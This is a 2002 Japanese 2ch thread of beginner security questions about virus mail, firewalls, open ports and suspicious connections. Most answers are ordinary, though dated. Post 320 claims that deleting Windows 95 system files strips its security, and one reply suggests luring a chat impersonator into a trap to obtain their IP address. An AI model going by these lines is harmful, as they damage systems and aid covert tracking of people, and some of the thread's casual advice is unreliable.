■ 初心者用質問スレッド Part6 ■

このエントリーをはてなブックマークに追加
239名無しさん@お腹いっぱい。
今日、変なメールが届きました。
>>あなたは、不正にウィルスを他人に送ってますね。
>>こんなもの送るなんて、人間失格やね。
>>また送ってきたら、あんたの所荒らすから♪
>>サーバーから経由串や所在地まで把握しといたから。
>>ネットにばら撒こうかな〜
というものです。全く身に覚えがありません。
私が使ってる他のアカウントにも同内容のメールが届きました。
すごく気味が悪いのですが、こういうこともできるのですか?
IP見たら某大学からだったようなのですが、
何か手を打った方がいいでしょうか?
ちなみにこのメールが来る前に一つDOHFDKDO.exeという
ウィルスメールが届いてました。こちらのメールはOCNで
その大学と同じ市でした。
>>239
大学にメールを送って注意喚起してもいいけど、
「DQN学生のくせして訳の分からんメールで人を脅すな、ヴォケ」
って逆に脅してもいいかも(嘘

同じ市だからといって同一人物だとか余計な詮索なんてしないで、
とっとと捨てて忘れなさい。くどかったら、禁止リストに入れなさい。
241239:02/01/19 06:08
240さん、レスありがとうございます。
無視して忘れた方がいいですよね。
でも、これでどこまで情報が漏れているか不安なんです。
メール盗み見されたりしますか?
アカウントとパス変えたほうがいいですかね?
242名無しさん@お腹いっぱい。:02/01/19 06:22
こちらに始めて質問します。
先日から、某チャットに、常連さんの偽者が出没するんですが、
どうやったらIPアドレスを取得できるでしょうか?
よろしくお願いします。
>>241
何の情報が漏れると困るのか分からん以上は何とも言えんが、
その人(だけ)にメールの盗み見されるのを危惧しているんならアカ変えれば?

ただ、アカを変えたらメールの盗み見が無くなるって
わけでもないので悪しからず。
>>242
方法は腐るほどあるので与えられた情報がそれだけでは何とも言えません。
245239:02/01/19 06:52
>>243さん
情報漏れて困るのはメールと、ファイルも見られては困る物もあります。
今盗み見されてるのであればアカ変えて・・・、
他にやったほうがいい事はありますか?
友人の話によると、踏み台にされていて、
その人にウィルスメールを送ってしまったんではないかとも言ってました。
246242:02/01/19 07:10
>>244
あとは、どのような情報が必要でしょうか?
>>245
ほかにやった方がいいこと
・「ハッカー」と「バッカー」の違いが分かるまで
たくさんのHPをまわって知識を得る。

>>246
少なくとも、
OS、チャットに使うアプリ等の自分の持っている環境。
自分の立場等の対外的な環境。
>>246
使用しているメールクライアントはローカルなものか? hotmailなどのwebmailか?
アンチウィルスのインストールの有無。 他に不審なメールが来てないか?

>>242
チャットの設置人に聞く。
罠に誘導する。
249 :02/01/19 15:12
ところでメールを介して感染するウイルスの類は
Outlook以外のメールソフト(Webメールや他のメールソフト)
使ってたら安全なの
>>250
お前次第だろ、としか言えんぞ。
252250:02/01/19 17:13
添付ファイルは気になってバイナリエディタで覗いてしまうんだが
これはやばくないと思っている俺はどうだろうか?
253名無しさん@お腹いっぱい。:02/01/19 17:17
特定の人からのメールを受け取り拒否にしたいのですが、
アウトルックでは可能ですか?

もしそういう設定に便利なソフトがあったら教えて下さい。
254 :02/01/19 17:24
>>252
対策ソフトを持っていないおまえはヤバい
255250:02/01/19 17:35
対策ソフトを持っていても面倒くさくて入れてない俺はやばい
>>252
そんなもん別にやばくない
257名無しさん@お腹いっぱい。:02/01/19 19:55
age
258  :02/01/19 19:55
WORLD-NETというとこから不正アクセスがあったんだけど、、
WORLD-NETてどんなとこ?
259墓守:02/01/19 20:28
260名無しさん@お腹いっぱい。:02/01/20 06:14
どうも、厨房です。
ファイヤーウオールって二重三重四重にかけて意味あるんでしょうか?
>>260
同じソフトなら通信速度が遅くなるだけだと思います。
違うソフトやシステムだった場合は、それに依存した部分での
弱点が補強されるカモ知れないと思います。

私も厨房なので、結局思うだけなのですが。
回線切って2度と繋がない。これ最強。
つか、四重って…(w
263名無しさん@お腹いっぱい。:02/01/20 12:57
>>253
とりあえず、メッセージルールを指定してゴミ箱直行にすれば?
264名無しさん@腹いっぱい:02/01/20 13:23
attach1(187b)という名の添付ファイルが送信されてきたんですけど知ってる人いますか?
送り主が不明で件名が文字化けしているので何が何やら。
心当たりは出会い系サイトでメールを送信したことくらいしかありません。
誰か御教授お願い致します。
265名無しさん@お腹いっぱい。:02/01/20 13:37
前にも同じような質問があったけど変なホームぺ−ジを踏んでいらいウィンドウの
大きさを調節するところがおかしくなりました。どうしたらもとどうりなりますか
お願いします。
266名無しさん@お腹いっぱい。:02/01/20 14:02
>>265
セーフモードで再起動
267墓守:02/01/20 14:02
>>265
再起動すると治りますよ。
http://homepage2.nifty.com/winfaq/fontstrouble.html
268墓守:02/01/20 14:04
>>266
ケコーンする?
269名無しさん@お腹いっぱい。:02/01/20 14:13
ネットゲームでポートを開けたいんですけど
プロバイダのサポートじゃ推奨以外の設定は教えて
くれないし、ルーターの説明書も専門用語ばっかしでわかんないです。
難しいんでポートの設定をあきらめて
動作モードをNATルーターからブリッジにしたらポートは全部開くんですか?
270名無しさん@お腹いっぱい。:02/01/20 14:18
セーフモードってなに?
271 :02/01/20 14:51
>>270
使っているコンピュータのマニュアルとかにあるはずだけどね。
下記のところで、サイト内検索で「セーフモード」としてみ。
http://homepage2.nifty.com/winfaq/
272名無しさん@お腹いっぱい。:02/01/20 14:51
>>270
Windowsの起動に必要な最小限のファイルだけを読み込んで起動するモード

質問いいですか?netstat -snって何でしょうか?netstat -anやろうとして
間違えて入力してしまったんですが、なんか色々表示されたので・・。
検索しても日本語のページは2件しか引っかからないんですが。
273 :02/01/20 14:55
>>272
-snとかつけて検索したの?
netstatだけなら沢山ひっかかったけどね。
中には書式を書いているのもあると思うよ。

http://www.google.com/search?q=netstat&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=lang_ja
274 :02/01/20 15:00
>>269
テレビ電話の例ではブリッジモードでOKらしい。
http://dekiru.goo.ne.jp/200202/special/02_2.html

ポートが開いているかどうか知りたい場合には
Shields UP !
https://grc.com/x/ne.dll?bh0bkyd2
を見るのが常道なんだけど。
275272:02/01/20 15:05
>>273
どうもありがとう。-snというか -sなんですね。
プロトコルごとの統計情報が表示されると書いてあったス・・。
イマイチわかりませんが・・(藁 ありがとでした!
276名無しさん@お腹いっぱい。:02/01/20 15:09
>>266
>>267
レスありがとうございます。
おかげで直りました。
277助けて〜:02/01/20 15:10
青い顔が出る オバケか?
どうすりゃいいの?
まじで怖い・・・誰か知りませんか?
278断る:02/01/20 15:13
>>277
そんな情報でどうやって助けろってんだ?アフォ
279助けて〜:02/01/20 15:14
助けてくれよぉ〜
280断る:02/01/20 15:17
>>279
とりあえず部屋の窓開けろ。話はそれからだ。
281助けて〜:02/01/20 15:20
開けたよぉー
282初心者:02/01/20 15:22
怪奇画像(怖い女)が一定感覚で現れる症状
http://pc.2ch.net/test/read.cgi/hack/1011083919/
283助けて〜:02/01/20 15:26
窓を開けてどうすりゃいいんだい?
284名無しさん@お腹いっぱい。:02/01/20 15:30
285断る:02/01/20 15:30
>>281
                        
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」 
―――――――――――――‐┬┘ 
                        |  
       ____.____    |   
     |        |        |   |   
     |        | ∧_∧ |   |  
     |        |( ´∀`)つ ミ | . ┌=====┐
     |        |/ ⊃  ノ |   |  ‖     ‖
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |  ‖___ ‖
                       └-──┘
>>285
禿げしくワラタ
287コピペ花子:02/01/20 17:27
誰か助けて!このままじゃ今日も眠れないよう。。
串をちゃんと刺せません!(逆ギレ気味)
詳しく手取り足取り教えてぐだざい〜

環境は
WINDOWS98 IE6 ダイヤルアップ接続 ファイヤーオール有効
初心者のくせにプロキシランチャー、DLしてみたけど余計にこんがらがった。

通常の接続しないにチェック
LAN設定ーアドレス・ポート入力ー詳細設定したです。串リストから。
診断する串経由になってません???なぜ???
なにがどういけないのかさえも分かってません。
ファイアーオールがProxy〜をインバウンド遮断が原因ですか?
288名無しさん@お腹いっぱい。:02/01/20 17:40
>>239 さん
私は別スレに同じ事書いた者です。
もしかして、BEA-NETに登録してませんか?
BEAに問合せた結果
ウィルスが送信元であるBEAの緊急用メールアドレスに送信
されてしまいました。
たまたま緊急用メールシステムが、その緊急用メールアドレスにメー
ルを送ると、登録された会員全員にメールを配信する設定になってい
たため、結果的に多くの会員の方に、ウィルス添付メールを含む覚え
のないメールが送信されるという事故が発生致しました。

だから気にする事ないよー
東条も自分で出したメールを受け取っているだろーから
289まかひーFW:02/01/20 17:52
例によってマカに困ったことが発生致しました。

★マカフィーファイアーウォールは不正なアクセスにより
書き換えられました。・・・というような一文(警告?)が。
あわててFWのログを見ると、確かにダイアルアップのネットBIOSを
承認するに書き換えられております。
ダイアルアップ接続じゃないので、そこは何にもチェックいれていなか
ったのですが、これはヤバイ状況なのでしょうか?
あまりにも自分が厨房くさくてここで質問するのも恥ずかしいのですが
よくわからないというのが現状です。
そしてそんなに簡単に書き換えができるんじゃFWの意味がない・・・
或いは自分の設定の仕方に明らかなミスがあるのでしょうか?
気になるともう眠れません(><)
とりあえず人工が多そうなココで。
290 :02/01/20 18:40
>>289
マカフィーやめればいいのに
まかからの乗り換え先ってどこが一番多いんだろう?
自分はばすたーだけど
292 :02/01/20 22:26
>>291
全然根拠なしだけど、ノートンとトレンドマイクロ半々ぐらい?
あと、若干が無料で使えるのとか少数派に流れるぐらい?
293コピペ花子:02/01/20 22:47
>>289さん

自分も最初マカフィだったけど最新の定義する時に停止しまくり。
良い噂もあまり聞かなかったんでノートンにしました。イイ!YO。

って誰か俺の>>287質問に答えておくれーー!!

環境は
WINDOWS98 IE6 ダイヤルアップ接続 ファイヤーオール有効
初心者のくせにプロキシランチャー、DLしてみたけど余計にこんがらがった。

通常の接続しないにチェック
LAN設定ーアドレス・ポート入力ー詳細設定したです。串リストから。
診断する串経由になってません???なぜ???
なにがどういけないのかさえも分かってません。
ファイアーオールがProxy〜をインバウンド遮断が原因ですか?
詳しく教えてください。
294名無しさん@お腹いっぱい。:02/01/20 23:48
wyvern-2.0-PR06.tar.gzというファイルがウィルス(Unix.Penguin)に
感染してたのですが、らるちーで解凍しようと思ったらDLLがなかったので
解凍できずに中を覗いただけでした。
これって、感染したのでしょうか? 大丈夫なのでしょうか?
>>294
らるちーって、LINUX版有ったの??
296コピペ花子:02/01/20 23:52
297名無しさん@お腹いっぱい。:02/01/20 23:53
ファイルローグというソフトをつかってて、次回起動させたら
windowsに記憶させてあるはずのパスワードがすべて消えていました。
これは侵入されたということなのでしょうか?
また、侵入されてた場合にどのような被害が考えられますか?
298ともこ:02/01/20 23:56
ノートンインターネットセキュリティを使っています。
アラートトラッカーにサブセブンで攻撃されてるとかって出たらどうすればいいんですか。
もう初心者なもので何もわかんないです。
お願いします
299ななし:02/01/21 00:00
>297
それだけじゃ判らん
>298
インバウンドをブロックしたとか遮断した、とか
書いていない?
そう書いてあれば問題ない。放置して可
>>294
つか、それ置いてあるディレクトリまで移動したら、
$ gunzip wyvern-2.0-PR06.tar.gz
すれば、解凍できるよ。
後は、$ tar xvf ね。知ってると思うけど。
DLL??
301297:02/01/21 00:10
>299
初心者なので具体的に何を書けばわからないのですが?
すみません。
302299:02/01/21 00:16
>301
OSの種類 やウィルスチェックはしたかどうか、
そもそもファイルローグで、何をしていたのか、などなどあるが、
初級ネット板にマルチポストしたので相手にしない。

心配なら、明日お店に行って、ファイアウォールソフト買って来なさい。
303297:02/01/21 00:20
すみません。マルチポストという言葉も始めて聞いたもので。
これぐらいの初心者なのですが。
windows98でファイルローグで音楽落としてました。
ウイルスチェックはしましたが大丈夫でした。
304294:02/01/21 00:29
>>300
あっ、スイマセン。
説明が不十分でしたね。
私が言いたかったのは、圧縮ファイルがウィルスの場合、
解凍しなくても感染したことになるのかを聞きたかったのです。
305300:02/01/21 00:41
>>304
解凍しなければ大丈夫です。但し、アンチウイルスはほぼ圧縮ファイルも
スキャン対象なので検出はします。
つか、tar.gzでwinのファイル圧縮する人って結構居るのかな。。。
306名無しさん@お腹いっぱい。:02/01/21 01:30
突然ファイアー(ゾヌ)が
RUN a DLL as an App てをブロックしたんだが、なんだろこれ?
最近ノックされる回数が増えてます。気持ち悪いです。
307名無しさん@お腹いっぱい。:02/01/21 01:54
圧縮ファイルを解凍しただけで感染するん?
308 :02/01/21 01:55
----VE7G9MZO1
Content-Type: application/octet-stream; name="AJJAJIAJ.EXE"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AJJAJIAJ.EXE"

これなんですかね
件名無しのメールにひっついてました
こわくてあけてません
309 :02/01/21 02:03
>308
添付ファイルの前2文字と後ろ2文字が同じ=ハイブリスの可能性大
捨てた方が吉
310初心者:02/01/21 02:50
セキュリティ チェックサイト Shields UP !でチェックしたら
port139 NetBIOSと port5000UPnpがOPEN!だった・・・
これって大丈夫なんですか?
大丈夫じゃないような気がするんですけど。
OSはMeです。
既出だけど。
http://www.personalfirewalljapan.com/solution/bios9x.htm
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-059
UPnPのほうはパッチ意味ないかもしれない。どうせ使わないからアプリケーション追加削除から
チェックはずしていいんじゃない?
312308:02/01/21 03:06
ども
313310:02/01/21 03:27
>311
レスありがとうございます。
314Virus Creation Tools (54) :02/01/21 03:52
315名無しさん@お腹いっぱい。:02/01/21 10:19
オンラインのウィルスチェックってメールもチェックしてくれるの?
なんかウィルスメールっぽいの受信して開けられず(プレビューもできず)
です。
添付があって、件名と送信者が文字化けしてます。
316col:02/01/21 10:37
>>315
オンラインチェックはよく分からんのですが
修正モジュールを適用していればプレビューしても感染しません。
もちろんHTMLメールを表示しない設定にしていればの話ですがね。

オンラインチェックはPOPだとチェックしてくれるんじゃなかろうか?
IMAPだとどう考えても無理っぽいよね。
この辺誰か詳しい方のレス希望。
317名無しさん@お腹いっぱい。:02/01/21 11:02
>>316
一応、まだメールを開いてない状態で
シマンテックのオンラインスキャンをして感染ゼロでした。
感染したあとじゃないと検出してくれないのかな?
318ど素人:02/01/21 11:13
WINMXもしくはファイルローグを使用してて、
パスワードファイルが外部から破壊されることはあり得るのでしょうか?
OSは98で、ADSL接続ルータタイプのモデムを使用しております。
ファイアーウォールソフトは導入しておりません。
宜しくお願いいたします。
319col:02/01/21 11:19
>>317
何を根拠にウィルスメールっぽいといっているのか
気になるところではありますが。
WindowsUpdate等で修正モジュール当ててメール読んでみたらいかが?
メールを読んで必要のないものなら破棄すればよいでしょう。
冷たいようですが、そのくらいのことができる知識が無いのならば
ウィルス対策ソフトを購入することをお勧めします。
320名無しさん@お腹いっぱい。:02/01/21 11:21
Windows95のセキュリティ破壊

Systray.exeとwininit.exeを削除して再起動するとセキュリティはなくなる。
321名無しさん@お腹いっぱい。:02/01/21 11:26
>>319
そりゃ、買うよ。
でも今は現実にNAVが入ってないの?
そっから話できんかな?
322col:02/01/21 11:28
>>318
WinMXはIPアドレスがわかってしまうので狙い撃ちは可能です。
が、Cドライブを共有していたりしない限り簡単にやられることはないかと。
323col:02/01/21 11:37
>>321
初めにも言いましたが、オンラインチェックの仕様がよく分からないので
はっきりしたことがいえません。
POPでメールと添付ファイルがローカルディスクに落ちていれば有効だとは思いますが
確証が得られません。
なので、メールソフトはOutlookExpressを使用していると仮定して
修正モジュールを適用してメールを見ただけで感染する状況を防いだ上で
メールを見て判断すべきだと思います。
ということを言いたかったのです。つたない文で申し訳ない。
>>310
NetBIOSがOPENなんて最悪。
閉じときなさい。んで、Freeのでもいからファイヤーウォール入れとけ。
325ともこ:02/01/21 13:28
>>299
レスありがとうございました。ブロックとかになってましたです。

あと、ワタシもシールズアップのポートプローブやったんですが、SMTPとUPnPが開いてました。
UPnPのほうはそのページの手順に従ってソフトDLしてすぐ閉じれたんですが、SMTPはどうなんでしょう。
これは開いたままでもいいものなんですか?
326名無しさん@お腹いっぱい。:02/01/21 16:49
この間、とある板のメール欄を何気なくクリックしてみたら
なんと自分の氏名が書いてあったんです。
そして今日同じ所に行ってみると、そのメール欄は緑なっていて
何も見えなくなっていました。
これはどういうことなのでしょうか?
327 :02/01/21 17:53
>>326
クッキーとかオートコンプリートのせい
気にするな
 
329JS.Exception.Exploit :02/01/21 20:03
に感染したんですが、ファイルの場所がわかりません。検索しても出てこないんですがどうなってるんでしょう。
--------------
C:\Documents and Settings\user\Local Settings
\Temporary Internet Files\Content.IE5\LOCNXLG9\15[1].htm
は次のウィルスに感染しています: JS.Exception.Exploit
---------------
15[1].htmを削除すればいいみたいですがファイルが見つかりません。
userフォルダの中にLocal Settingsというフォルダも存在しません。
見えてないだけなんでしょうか?
330326:02/01/21 20:04
>>327
返答ありがとうございます。
あと、気にするなって事は、やはり情報を
抜かれてしまっているってことなのでしょうか?
331 :02/01/21 20:08
★必見★
パチマガで池上蓮から「旧友の自殺狂言騒動に抑えきれない嫌悪感」
で晒された本人(謎の人物)が池上に対して怒りまくってるぞ!!

謎の人物ホームページ↓
http://www.geocities.co.jp/Bookend-Hemingway/4715/

関連スレッド
謎の人物公式スレッド↓
http://kaba.2ch.net/test/read.cgi/pachi/1009686980/l50
>>330
抜かれていない。きみのPCの中の情報をきみのPCが表示しただけ。
333名無しさん@お腹いっぱい。:02/01/21 21:59
NIS2002を入れてます。
攻撃を受けた場合、IPから何処の串かまでは、
解るようになったんですが、相手を特定できるまでの
スキルがありません。どうやれば、相手を特定できますか?
334名無しさん@お腹いっぱい。:02/01/21 22:03
ページによって、URLがjavascript:openPWin()となって見れません。。
どうすればいいんですか?教えてください、、。
netstat -tをすると
tcp 1 0 xxxx:1170 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1169 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1168 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1167 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1166 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1165 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1164 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 1 0 xxxx:1163 srs12.ascii.co.jp:www CLOSE_WAIT
tcp 0 0 localhost:5680 localhost:1090 ESTABLISHED
tcp 0 0 localhost:1090 localhost:5680 ESTABLISHED
ってでて来るんですがポートスキャン食らってますか?
どう対処すればいいんでしょう?
こちらへどうぞ
http://pc.2ch.net/pcqa/
337墓守:02/01/21 22:18
>>335
LANなら起動直後、モデムならトップページ表示後にクローズして、しばらくたってからもう一度。
338 :02/01/21 22:26
http://choco.2ch.net/test/read.cgi/news/1011361670/-100
これを解説してください。
かなり前に開いたページなんですがずいぶん長い間
残ってるもんですね
340名無しさん@お腹いっぱい。:02/01/21 22:42
なんか良く分かりませんがモジラがWindowもないのに固まってました モジラがCPUを50%近く占有してました。killしたら上の netstat -t は消えました これって良く有ること何でしょうか?
341初(小)心者:02/01/21 22:45
Yahoo!BBから接続してるのですが、どうもgoogleが表示できません。
(トップページ以下すべて。google.co.jp google.comとも)

Web上で話題にもなってないし、間違いなく自分だけに起こってる現象
(若しくはY!BBユーザのみ??)だろうとおもっております。

Y!BBユーザーだから締め出されてるのか??とも思いますが、
知り合いはY!BBで閲覧できてるみたいです。

CookieやらActiveXやらJavaなどの表示・受け入れ設定などは素人
ですが本で読んで分かる範囲ならきちんと設定できている・・・はずです。

スパイソフトでは?などと思い、Ad-awareなるソフトでチェック
もしてみましたが見つけられませんでした。

Symantecのオンラインセキュリティチェックを実行して、開いている
ポートがあったのであわててパーソナルファイアウォールの体験版を
臨時であてましたが、googleは表示できません。侵入も検出してません。


そこで質問なのですが、特定の人が特定のサイトを表示できないように
することは、スパイソフトやコンピュータへの侵入以外で可能なの
でしょうか。可能ならば、その方法や対処法を教えていただけませんで
しょうか。(対処法だけでも、ありがたいです。)

これまでの文面をお読みいただければわかってもらえるかもしれま
せんが、あまりスリルを楽しんだりするのが好きなわけではないので、
アングラサイトとかは見てません。2Chに来たのも正直言って検索サイト
が使えないとどうしようもなくなってしまったからです。

*メールも、HTML非表示はもちろん、実行可能タグとかも無効
 にしております。

インターネット歴は長めですが、セキュリティについてそれほど真剣に考えて
いなかったことを後悔しております。いきなりのADSLで、知識も初心者なので
みなさまの助言いただきたく思います。
342IPアドレス:02/01/21 23:26
ある掲示板に書き込みをしたところ、他の人間とIPアドレスが全く一致したことがありました。
このようなことは、可能性としてありえるのでしょうか?

ちなみに私はダイヤルアップ接続です。

1.偶然一致することはありえるのか?
2.偶然以外で考えられる可能性は何か?

非常に気になっています。どなたか親切な方、教えて下さい。
343墓守:02/01/21 23:31
>>342
地域BBS(オフ系)で、一度他人とかぶったことがあります。
そんなものです。
344名無しさん@お腹いっぱい。:02/01/21 23:33
>>342
>1.偶然一致することはありえるのか?
ありますよ。

>2.偶然以外で考えられる可能性は何か?
・同じproxyサーバーを経由して書き込んだ。
・偶然同じIPアドレスを割り当てられた。(要時間差)
>>342は日頃から見えない物が見える。
345名無しさん@お腹いっぱい。:02/01/22 00:06
なんか今晩立て続けにノックされてる感じ。
中国と香港からだった。
なんか、やだなあ。
ゾヌが防いでくれたらしいんですけど。
なんか気をつけることってありますか?
IEのセキュリティ・ホールは、いちおうふさいでると思うんですが…
>>345
インターネットを使わないときは回線を切るなど・・・。

>IEのセキュリティ・ホールは、いちおうふさいでると思うんですが…
塞いでも塞いでも穴が見付かるのが世の常です。
347IPアドレス:02/01/22 00:11
>343
>344

どうもありがとうございました。参考にします。
348345:02/01/22 00:26
>346
じつに含蓄あるお言葉です。
身にしみました。
>塞いでも塞いでも穴が見付かるのが世の常です。
>塞いでも塞いでも穴が見付かるのが世の常です。
…M$にも教えてやりたいと思います。
あと、ahooBBにも。
いままでほとんどゾヌが働かなかったのに、今日は大活躍…。

>>341
↓とりあえずこの辺の設定はどんな感じですか?

【Googleのキャッシュ】
http://www.google.com/search?q=cache:dTtjU2raEQUC:mroom.cool.ne.jp/bb/adsl83.html+Yahoo+BB+%81%40%93%C1%92%E8%82%CC%83T%83C%83g%81%40%90%DA%91%B1&hl=ja&lr=lang_ja

【元のページ】
http://mroom.cool.ne.jp/bb/adsl83.html

ところで、使用しているパソコンの「OS」、「ブラウザ」、「ルーター」の種類がわかれば、もっと意見が集まるのでは。
350未知のウイルス:02/01/22 02:14
351名無し:02/01/22 02:29
スレ違いかもしれないけど、
他人のPCに侵入するのって犯罪にならないんですかね?
(最近侵入されて色々情報をぬかれた・・トホホ)
352_:02/01/22 04:37
ノートン先生のインターネット・セキュリティ2002を使ってます。
2ヶ月ほど前にADSLをブリッジタイプからルータータイプに変えま
した。ブリッジの頃は頻繁に不正侵入だかなんだか外部からアタ
ックを受けていましたが、ルーターにしてからはぜんぜんアタック
されないです。ルーターはセキュリティ高いってのがよくわかりま
した。インターネット・セキュリティはアンインストしてもいーすかね
?トロイの木馬もアンチ・ウィルスが発見してくれると思うんすけど
・・・どーですか?
353  :02/01/22 06:01
142のカキコみてて思ったんですけど割れたものに限らず
ノートンとかウイルスバスターとかってアップデートする
とき以外に個人の情報とか勝手に送っているんですか?
送ってないならアップデートしない限り割れたもの使ってても
ばれないよね?  え〜と詳しい人オシエテください。
354名無しさん@お腹いっぱい。:02/01/22 06:13
EXIT KILLER ポップアップ ターミネーター
これって何?
355 :02/01/22 06:15
>>351
犯罪だ 法律ができた

>>352
そのままにしておけ
ルーターを過信しすぎるのはよくない

>>353
割れた物を使ってるやつにコメントはしない
去れ 犯罪者

>>354
分からない用語は辞書でもみて調べろ
357353:02/01/22 07:10
>>353
割れた物を使ってるやつにコメントはしない
去れ 犯罪者

オイラは割れた物は使ってないよ。
オイラが聞きたかったことはノートンなどのソフト
(シェア フリーを問わず)を使ってて自分以外の
第三者が使ってるのを知りえるのか?ということが知りたかったんで・・・
聞いてはいけないことだったらスマソ。
>>357
だからお前は使う予定があるんだろ? >>353でそう書いてある
ノートンはシェアでもフリーでもない 製品だ
359なんじゃ こりゃ?:02/01/22 07:44
日付: 02/01/22 時刻: 7:41:44
今回 1 回だけユーザーが選択したのは 「ブロック」 通信。 詳細:
インバウンド ICMP 要求
リモートアドレス、サービスは www.google.com,http
プロセス名は XタpツXタpツ
360名無しさん@お腹いっぱい。:02/01/22 13:48
掲示板の荒らしを懲らしめる方法ってないですか?管理者が行方不明で利用者
である僕の立場じゃどうしようもなくて困ってます。
361  :02/01/22 13:57
単なる利用者ごときに無理>360
362初(小)心者:02/01/22 15:50
>>341

アドバイスどうもありがとうございます。MTU値などはリスクが大きいと思い、
いじっていませんでした。(セキュリティ板とは違う話題かも知れないですが、
普通の状態で3Mでているので、もっと悲惨な速度の人もいるようなので
これはこれで満足しております。)

OSはWinMeです。
*家にあるWin98デスクトップでも表示できませんでした。

ブラウザはIE6です
*N6でもだめでした。

ルータは設置していませんでした。しかしセキュリティについて調べて今の状態が
あまりに危険だと判断したため、簡易ファイヤーウォール機能付きでも急いで導入
しようとおもっております。coregaのCG-BARSW4PPROを購入しようと考えております。

*余談ですがこのルータ、あるサイトで、セキュリティ設定が貧弱などと
 叩かれておりました。この点について、詳しく知っておられる方、よければ
 教えていただけないでしょうか。またセキュリティ面でオススメのルータ等
 があればよろしくお願いします。以上身勝手な相談でした。

リストラ予備軍ですので仕事中はあまりWeb見られなくて、調べが足りない
点あるとおもいますが、ご了承ください。
363初(小)心者:02/01/22 15:53
>>349
の方、アドバイスどうもありがとうございます。
364名無しさん@お腹いっぱい。:02/01/22 16:25
初心者たんにはこれをお奨めしたい

http://aterm.cplaza.ne.jp/broadband/index.html
365名無しさん@お腹いっぱい。:02/01/22 18:07
snortのログ。
123.456.789.10(相手のホスト;架空のIP)から987.654.321.000(自分のホスト;架空のIP)に攻撃?

Jan 20 01:47:00 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:47:12 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:47:36 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:48:24 123.456.789.10:35799 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:49:51 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:50:00 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:50:12 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:50:36 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 20 01:51:24 123.456.789.10:35800 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:29:26 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:29:38 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:30:02 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:30:50 123.456.789.10:36063 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:32:17 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:32:26 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:32:38 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:33:02 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS
Jan 21 13:33:50 123.456.789.10:36067 -> 987.654.321.000:80 SYN 12****S* RESERVEDBITS

板違いorスレ違いだったらすんません。
366 :02/01/22 19:02
すみません、書き込みするときにブラウザが変ですよ
と出ます。ノートンが原因だと思うのですが無効にしても
直りません。解決策は無いでしょうか?
367 :02/01/22 19:06
>>366
ノートン関係のスレ見てみそ。ズバリのスレタイトルすらあるぞ。
368初(小)心者:02/01/22 22:04
昨日、googleが表示できないと投稿した者です。
今日、どうしても問題が解決しないのでいろいろとチェックして
いたんですが、(たぶん)保存されたCookieを全部削除したあと
表示してみたら、ちゃんと表示できました。

一応これで問題は解決しましたが、この板を読んでいてセキュリティ
の大切さを初めて痛感しました。これからファイヤーウォールソフトや
ルーターやら導入して、ちゃんと勉強して出直してきます。

レスをくれた2人(?)の方、ありがとうございました。今度はこちらから
初心者にアドバイスできるぐらいまで勉強して戻って来ます。

それでは。
>368
どのぐらい溜めてたんだろ。。。
370ドキンちゃん:02/01/23 05:55
371名無しさん@お腹いっぱい。:02/01/23 13:27
ウイルスバスター2002でやってみたところ
WORM_SKA.DLL
WORM_SKA.A
WORM_SKA.WSOCK32
というウイルスが見つかって駆除ツールとかやってみましたが
どうもならないので手動で消すやり方でやっても
システムが使用中だから消せないってでます。
その場合はセーフモードでしてくださいと書いてあったので
そうしたのですが使用中で消せないってまたでます。
Meなんですけどどうしたらよいか教えていただけないでしょうか。
>>371
起動ディスク使え〜〜〜〜〜
373お願いします。:02/01/23 14:33
>>ALL
IE5.5の「ホームページ」の設定が、PCを再起動するたびに
架空の固定サイト「アドレス自体はもう存在しないです。」に設定されていまします。
オプションで「空白のページ」や「別の既存のサイト」を指定しても再起動すると、
先の固定のサイトに設定されてしまします。どうしたら通常にもどるでしょうか?
OS:Win2000Pro/SP2
IE:5.5/SP2
の構成です。
374嫌です。:02/01/23 14:56
適当なウィルス対策ソフト買ってきなさい。
375名無しさん@お腹いっぱい。:02/01/23 16:08
66.150.5.36って何でしょうか?IPドメインサーチ
してもよくわからないんですが・・。
この前何気にnetstat -aやってみたらかなり長い時間接続中に
なってたんですが。どなたか教えていただけないでしょうか。
ちなみに相手のポート80に繋がってました。変なサイトなんか逝ってないんですが・・。
376名無しさん@お腹いっぱい。:02/01/23 17:12
>>375 サム君で調べろ。http://www.samspade.org/
